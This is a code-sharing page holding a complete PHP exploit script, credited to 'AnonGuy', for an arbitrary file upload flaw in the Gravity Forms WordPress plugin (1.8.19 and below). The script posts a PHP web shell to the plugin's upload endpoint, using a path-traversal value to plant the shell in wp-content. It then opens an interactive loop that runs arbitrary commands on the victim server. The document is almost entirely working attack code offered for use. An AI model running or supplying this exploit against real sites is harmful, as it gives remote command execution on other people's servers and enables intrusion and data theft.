扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 |
<?php /**************************************************************************************************************************** * * Exploit Title: Gravity Forms [WP] - Arbitrary File Upload * Vulnerable Version(s): 1.8.19 (and below) * Write-Up : https://blog.sucuri.net/2015/02/malware-cleanup-to-arbitrary-file-upload-in-gravity-forms.html * Coded by : Abk Khan [ an0nguy @ protonmail.ch ] * *****************************************************************************************************************************/ error_reporting(0); echo " _____ _ _ _______ _ / ____| (_) | |____|| | | | |__ _ __ __ ___ ___| |_ _ _| |__ __ _| | |___ | | |_ | '__/ _<code> \ \ / / | __| | | |__/ _</code> | | / __| | |__| | | | (_| |\ V /| | |_| |_| | | | (_| | | \__ \ \_____|_|\__,_| \_/ |_|\__|\__, |_|\__,_|_|_|___/ __/ | |___/ > an Exploiter by AnonGuy\n"; $domain= (@$argv[1] == '' ? 'http://localhost/wordpress' : @$argv[1]); $url = "$domain/?gf_page=upload"; $shell = "$domain/wp-content/_input_3_khan.php5"; $separator = '-------------------------------------------------------------------'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, '<?php system($_GET[0]); ?>&form_id=1&name=khan.php5&gform_unique_id=../../../../&field_id=3'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); if (strpos($response, '"ok"') !== false) { echo "$separator\nShell at $shell\n$separator\nSpawning a 'No-Session' Shell . . . Done!\n$separator\n"; while ($testCom != 'exit') { $user= trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20whoami;%20echo%20'~'"), '~', '~')); $b0x = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20hostname;%20echo%20'~'"), '~', '~')); echo "$user@$b0x:~$ "; $handle= fopen("php://stdin", 'r'); $testCom = trim(fgets($handle)); fclose($handle); $comOut= trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20" . urlencode($testCom) . ";%20echo%20'~'"), '~', '~')) . "\n"; echo $comOut; } } else { die("$separator\n$domain doesn't seem to be vulnerable! :(\n$separator"); } function get_string_between($string, $start, $end) { # stolen from stackoverflow! $string = ' ' . $string; $ini= strpos($string, $start); if ($ini == 0) return ''; $ini += strlen($start); $len = strpos($string, $end, $ini) - $ini; return substr($string, $ini, $len); } ?> |
体验盒子
